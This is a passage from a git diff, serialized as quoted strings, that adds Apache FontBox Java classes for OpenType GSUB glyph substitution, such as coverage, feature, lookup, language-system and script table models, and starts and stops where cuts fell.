"+ private List applyGsubFeature(Map, Integer> featureMap,", + "+ List originalGlyphs)", + "+ {", + "+", + "+ GlyphArraySplitter glyphArraySplitter = new GlyphArraySplitterRegexImpl(", + "+ featureMap.keySet());", + "+", + "+ List> tokens = glyphArraySplitter.split(originalGlyphs);", + "+", + "+ List gsubProcessedGlyphs = new ArrayList<>();", + "+", + "+ for (List chunk : tokens)", + "+ {", + "+ if (featureMap.containsKey(chunk))", + "+ {", + "+ // gsub system kicks in, you get the glyphId directly", + "+ int glyphId = featureMap.get(chunk);", + "+ gsubProcessedGlyphs.add(glyphId);", + "+ }", + "+ else", + "+ {", + "+ gsubProcessedGlyphs.addAll(chunk);", + "+ }", + "+ }", + "+", + "+ LOG.debug(\"originalGlyphs: \" + originalGlyphs + \", gsubProcessedGlyphs: \"", + "+ + gsubProcessedGlyphs);", + "+", + "+ return gsubProcessedGlyphs;", + "+ }", + "+", + "+ private static List getBeforeHalfGlyphIds(CmapLookup cmapLookup)", + "+ {", + "+ List beforeHalfGlyphIds = new ArrayList<>();", + "+", + "+ for (char beforeHalfChar : BEFORE_HALF_CHARS)", + "+ {", + "+ beforeHalfGlyphIds.add(cmapLookup.getGlyphId(beforeHalfChar));", + "+ }", + "+", + "+ return Collections.unmodifiableList(beforeHalfGlyphIds);", + "+", + "+ }", + "+", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/package.html b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/package.html", + "new file mode 100644", + "index 000000000..a3349107e", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/package.html", + "@@ -0,0 +1,25 @@", + "+", + "+", + "+", + "+", + "+", + "+", + "+", + "+This package contains utility classes which extract meanigful data from the highly obfuscated GSUB table structures.", + "+", + "+", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTable.java", + "new file mode 100644", + "index 000000000..8dcb5a271", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTable.java", + "@@ -0,0 +1,48 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.common;", + "+", + "+/**", + "+ * This class models the", + "+ * Coverage Table in the", + "+ * Open Type layout common tables.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public abstract class CoverageTable", + "+{", + "+ private final int coverageFormat;", + "+", + "+ public CoverageTable(int coverageFormat)", + "+ {", + "+ this.coverageFormat = coverageFormat;", + "+ }", + "+", + "+ public abstract int getCoverageIndex(int gid);", + "+", + "+ public abstract int getGlyphId(int index);", + "+", + "+ public abstract int getSize();", + "+", + "+ public int getCoverageFormat()", + "+ {", + "+ return coverageFormat;", + "+ }", + "+", + "+}", + "\\ No newline at end of file", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTableFormat1.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTableFormat1.java", + "new file mode 100644", + "index 000000000..7d3888403", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTableFormat1.java", + "@@ -0,0 +1,72 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.common;", + "+", + "+import java.util.Arrays;", + "+", + "+/**", + "+ * This class models the", + "+ * Coverage format 1", + "+ * in the Open Type layout common tables.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class CoverageTableFormat1 extends CoverageTable", + "+{", + "+", + "+ private final int[] glyphArray;", + "+", + "+ public CoverageTableFormat1(int coverageFormat, int[] glyphArray)", + "+ {", + "+ super(coverageFormat);", + "+ this.glyphArray = glyphArray;", + "+ }", + "+", + "+ @Override", + "+ public int getCoverageIndex(int gid)", + "+ {", + "+ return Arrays.binarySearch(glyphArray, gid);", + "+ }", + "+", + "+ @Override", + "+ public int getGlyphId(int index)", + "+ {", + "+ return glyphArray[index];", + "+ }", + "+", + "+ @Override", + "+ public int getSize()", + "+ {", + "+ return glyphArray.length;", + "+ }", + "+", + "+ public int[] getGlyphArray()", + "+ {", + "+ return glyphArray;", + "+ }", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(\"CoverageTableFormat1[coverageFormat=%d,glyphArray=%s]\",", + "+ getCoverageFormat(), Arrays.toString(glyphArray));", + "+ }", + "+", + "+", + "+}", + "\\ No newline at end of file", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTableFormat2.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTableFormat2.java", + "new file mode 100644", + "index 000000000..2f27b75af", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/CoverageTableFormat2.java", + "@@ -0,0 +1,75 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.common;", + "+", + "+import java.util.ArrayList;", + "+import java.util.List;", + "+", + "+/**", + "+ * This class models the", + "+ * Coverage format 2", + "+ * in the Open Type layout common tables.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class CoverageTableFormat2 extends CoverageTableFormat1", + "+{", + "+ private final RangeRecord[] rangeRecords;", + "+", + "+ public CoverageTableFormat2(int coverageFormat, RangeRecord[] rangeRecords)", + "+ {", + "+ super(coverageFormat, getRangeRecordsAsArray(rangeRecords));", + "+ this.rangeRecords = rangeRecords;", + "+ }", + "+", + "+ public RangeRecord[] getRangeRecords()", + "+ {", + "+ return rangeRecords;", + "+ }", + "+", + "+ private static int[] getRangeRecordsAsArray(RangeRecord[] rangeRecords)", + "+ {", + "+", + "+ List glyphIds = new ArrayList<>();", + "+", + "+ for (int i = 0; i < rangeRecords.length; i++)", + "+ {", + "+ for (int glyphId = rangeRecords[i].getStartGlyphID(); glyphId <= rangeRecords[i]", + "+ .getEndGlyphID(); glyphId++)", + "+ {", + "+ glyphIds.add(glyphId);", + "+ }", + "+ }", + "+", + "+ int[] glyphArray = new int[glyphIds.size()];", + "+", + "+ for (int i = 0; i < glyphArray.length; i++)", + "+ {", + "+ glyphArray[i] = glyphIds.get(i);", + "+ }", + "+", + "+ return glyphArray;", + "+ }", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(\"CoverageTableFormat2[coverageFormat=%d]\", getCoverageFormat());", + "+ }", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureListTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureListTable.java", + "new file mode 100644", + "index 000000000..0f05d8eea", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureListTable.java", + "@@ -0,0 +1,56 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.common;", + "+", + "+/**", + "+ * This class models the", + "+ * Feature List", + "+ * table in the Open Type layout common tables.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class FeatureListTable", + "+{", + "+ private final int featureCount;", + "+ private final FeatureRecord[] featureRecords;", + "+", + "+ public FeatureListTable(int featureCount, FeatureRecord[] featureRecords)", + "+ {", + "+ this.featureCount = featureCount;", + "+ this.featureRecords = featureRecords;", + "+ }", + "+", + "+ public int getFeatureCount()", + "+ {", + "+ return featureCount;", + "+ }", + "+", + "+ public FeatureRecord[] getFeatureRecords()", + "+ {", + "+ return featureRecords;", + "+ }", + "+", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(\"%s[featureCount=%d]\", FeatureListTable.class.getSimpleName(),", + "+ featureCount);", + "+ }", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureRecord.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureRecord.java", + "new file mode 100644", + "index 000000000..b6e9c609e", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureRecord.java", + "@@ -0,0 +1,54 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.common;", + "+", + "+/**", + "+ * This class models the", + "+ * Features and", + "+ * lookups in the Open Type layout common tables.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class FeatureRecord", + "+{", + "+ private final String featureTag;", + "+ private final FeatureTable featureTable;", + "+", + "+ public FeatureRecord(String featureTag, FeatureTable featureTable)", + "+ {", + "+ this.featureTag = featureTag;", + "+ this.featureTable = featureTable;", + "+ }", + "+", + "+ public String getFeatureTag()", + "+ {", + "+ return featureTag;", + "+ }", + "+", + "+ public FeatureTable getFeatureTable()", + "+ {", + "+ return featureTable;", + "+ }", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(\"FeatureRecord[featureTag=%s]\", featureTag);", + "+ }", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureTable.java", + "new file mode 100644", + "index 000000000..56101cd48", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/FeatureTable.java", + "@@ -0,0 +1,61 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.common;", + "+", + "+/**", + "+ * This class models the", + "+ * Feature table in the", + "+ * Open Type layout common tables.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class FeatureTable", + "+{", + "+ private final int featureParams;", + "+ private final int lookupIndexCount;", + "+ private final int[] lookupListIndices;", + "+", + "+ public FeatureTable(int featureParams, int lookupIndexCount, int[] lookupListIndices)", + "+ {", + "+ this.featureParams = featureParams;", + "+ this.lookupIndexCount = lookupIndexCount;", + "+ this.lookupListIndices = lookupListIndices;", + "+ }", + "+", + "+ public int getFeatureParams()", + "+ {", + "+ return featureParams;", + "+ }", + "+", + "+ public int getLookupIndexCount()", + "+ {", + "+ return lookupIndexCount;", + "+ }", + "+", + "+ public int[] getLookupListIndices()", + "+ {", + "+ return lookupListIndices;", + "+ }", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(\"FeatureTable[lookupListIndiciesCount=%d]\", lookupListIndices.length);", + "+ }", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LangSysRecord.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LangSysRecord.java", + "new file mode 100644", + "index 000000000..04a5fdc32", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LangSysRecord.java", + "@@ -0,0 +1,53 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.common;", + "+", + "+/**", + "+ * This class models the Language", + "+ * system tags in the Open Type Font specs.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class LangSysRecord", + "+{", + "+ private final String langSysTag;", + "+ private final LangSysTable langSysTable;", + "+", + "+ public LangSysRecord(String langSysTag, LangSysTable langSysTable)", + "+ {", + "+ this.langSysTag = langSysTag;", + "+ this.langSysTable = langSysTable;", + "+ }", + "+", + "+ public String getLangSysTag()", + "+ {", + "+ return langSysTag;", + "+ }", + "+", + "+ public LangSysTable getLangSysTable()", + "+ {", + "+ return langSysTable;", + "+ }", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(\"LangSysRecord[langSysTag=%s]\", langSysTag);", + "+ }", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LangSysTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LangSysTable.java", + "new file mode 100644", + "index 000000000..9cbe24572", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LangSysTable.java", + "@@ -0,0 +1,68 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.common;", + "+", + "+/**", + "+ * This class models the Language", + "+ * system tags in the Open Type Font specs.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class LangSysTable", + "+{", + "+ private final int lookupOrder;", + "+ private final int requiredFeatureIndex;", + "+ private final int featureIndexCount;", + "+ private final int[] featureIndices;", + "+", + "+ public LangSysTable(int lookupOrder, int requiredFeatureIndex, int featureIndexCount,", + "+ int[] featureIndices)", + "+ {", + "+ this.lookupOrder = lookupOrder;", + "+ this.requiredFeatureIndex = requiredFeatureIndex;", + "+ this.featureIndexCount = featureIndexCount;", + "+ this.featureIndices = featureIndices;", + "+ }", + "+", + "+ public int getLookupOrder()", + "+ {", + "+ return lookupOrder;", + "+ }", + "+", + "+ public int getRequiredFeatureIndex()", + "+ {", + "+ return requiredFeatureIndex;", + "+ }", + "+", + "+ public int getFeatureIndexCount()", + "+ {", + "+ return featureIndexCount;", + "+ }", + "+", + "+ public int[] getFeatureIndices()", + "+ {", + "+ return featureIndices;", + "+ }", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(\"LangSysTable[requiredFeatureIndex=%d]\", requiredFeatureIndex);", + "+ }", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupListTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupListTable.java", + "new file mode 100644", + "index 000000000..5a07b4cd4", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupListTable.java", + "@@ -0,0 +1,55 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.common;", + "+", + "+/**", + "+ * This class models the", + "+ * Lookup List Table", + "+ * in the Open Type layout common tables.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class LookupListTable", + "+{", + "+ private final int lookupCount;", + "+ private final LookupTable[] lookups;", + "+", + "+ public LookupListTable(int lookupCount, LookupTable[] lookups)", + "+ {", + "+ this.lookupCount = lookupCount;", + "+ this.lookups = lookups;", + "+ }", + "+", + "+ public int getLookupCount()", + "+ {", + "+ return lookupCount;", + "+ }", + "+", + "+ public LookupTable[] getLookups()", + "+ {", + "+ return lookups;", + "+ }", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(\"%s[lookupCount=%d]\", LookupListTable.class.getSimpleName(),", + "+ lookupCount);", + "+ }", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupSubTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupSubTable.java", + "new file mode 100644", + "index 000000000..3d090fe04", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupSubTable.java", + "@@ -0,0 +1,50 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.common;", + "+", + "+/**", + "+ * This class models the", + "+ * Lookup Sub-Table in the", + "+ * Open Type layout common tables.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public abstract class LookupSubTable", + "+{", + "+ private final int substFormat;", + "+ private final CoverageTable coverageTable;", + "+", + "+ public LookupSubTable(int substFormat, CoverageTable coverageTable)", + "+ {", + "+ this.substFormat = substFormat;", + "+ this.coverageTable = coverageTable;", + "+ }", + "+", + "+ public abstract int doSubstitution(int gid, int coverageIndex);", + "+", + "+ public int getSubstFormat()", + "+ {", + "+ return substFormat;", + "+ }", + "+", + "+ public CoverageTable getCoverageTable()", + "+ {", + "+ return coverageTable;", + "+ }", + "+}", + "\\ No newline at end of file", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupTable.java", + "new file mode 100644", + "index 000000000..1f7dc29ef", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/LookupTable.java", + "@@ -0,0 +1,70 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.common;", + "+", + "+/**", + "+ * This class models the", + "+ * Lookup Table in the", + "+ * Open Type layout common tables.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class LookupTable", + "+{", + "+ private final int lookupType;", + "+ private final int lookupFlag;", + "+ private final int markFilteringSet;", + "+ private final LookupSubTable[] subTables;", + "+", + "+ public LookupTable(int lookupType, int lookupFlag, int markFilteringSet,", + "+ LookupSubTable[] subTables)", + "+ {", + "+ this.lookupType = lookupType;", + "+ this.lookupFlag = lookupFlag;", + "+ this.markFilteringSet = markFilteringSet;", + "+ this.subTables = subTables;", + "+ }", + "+", + "+ public int getLookupType()", + "+ {", + "+ return lookupType;", + "+ }", + "+", + "+ public int getLookupFlag()", + "+ {", + "+ return lookupFlag;", + "+ }", + "+", + "+ public int getMarkFilteringSet()", + "+ {", + "+ return markFilteringSet;", + "+ }", + "+", + "+ public LookupSubTable[] getSubTables()", + "+ {", + "+ return subTables;", + "+ }", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(\"LookupTable[lookupType=%d,lookupFlag=%d,markFilteringSet=%d]\",", + "+ lookupType, lookupFlag, markFilteringSet);", + "+ }", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/RangeRecord.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/RangeRecord.java", + "new file mode 100644", + "index 000000000..8e3740399", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/RangeRecord.java", + "@@ -0,0 +1,62 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.common;", + "+", + "+/**", + "+ * This class models the", + "+ * Range Record in the", + "+ * Coverage format 2 in the Open Type layout common tables.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class RangeRecord", + "+{", + "+ private final int startGlyphID;", + "+ private final int endGlyphID;", + "+ private final int startCoverageIndex;", + "+", + "+ public RangeRecord(int startGlyphID, int endGlyphID, int startCoverageIndex)", + "+ {", + "+ this.startGlyphID = startGlyphID;", + "+ this.endGlyphID = endGlyphID;", + "+ this.startCoverageIndex = startCoverageIndex;", + "+ }", + "+", + "+ public int getStartGlyphID()", + "+ {", + "+ return startGlyphID;", + "+ }", + "+", + "+ public int getEndGlyphID()", + "+ {", + "+ return endGlyphID;", + "+ }", + "+", + "+ public int getStartCoverageIndex()", + "+ {", + "+ return startCoverageIndex;", + "+ }", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(\"RangeRecord[startGlyphID=%d,endGlyphID=%d,startCoverageIndex=%d]\",", + "+ startGlyphID, endGlyphID, startCoverageIndex);", + "+ }", + "+}", + "\\ No newline at end of file", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/ScriptRecord.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/ScriptRecord.java", + "new file mode 100644", + "index 000000000..e8524ef32", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/ScriptRecord.java", + "@@ -0,0 +1,53 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.common;", + "+", + "+/**", + "+ * This class models the Script tags", + "+ * in the Open Type Font specs.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class ScriptRecord", + "+{", + "+ private final String scriptTag;", + "+ private final ScriptTable scriptTable;", + "+", + "+ public ScriptRecord(String scriptTag, ScriptTable scriptTable)", + "+ {", + "+ this.scriptTag = scriptTag;", + "+ this.scriptTable = scriptTable;", + "+ }", + "+", + "+ public String getScriptTag()", + "+ {", + "+ return scriptTag;", + "+ }", + "+", + "+ public ScriptTable getScriptTable()", + "+ {", + "+ return scriptTable;", + "+ }", + "+", + "+ @Override", + "+ public String toString()", + "+ {", + "+ return String.format(\"ScriptRecord[scriptTag=%s]\", scriptTag);", + "+ }", + "+}", + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/ScriptTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/ScriptTable.java", + "new file mode 100644", + "index 000000000..24fe97d9d", + "--- /dev/null", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/table/common/ScriptTable.java", + "@@ -0,0 +1,56 @@", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+", + "+package org.apache.fontbox.ttf.table.common;", + "+", + "+import java.util.Map;", + "+", + "+/**", + "+ * This class models the Script tags", + "+ * in the Open Type Font specs.", + "+ * ", + "+ * @author Palash Ray", + "+ *", + "+ */", + "+public class ScriptTable", + "+{", + "+ private final LangSysTable defaultLangSysTable;", + "+ private final Map langSysTables;", + "+", + "+ public ScriptTable(LangSysTable 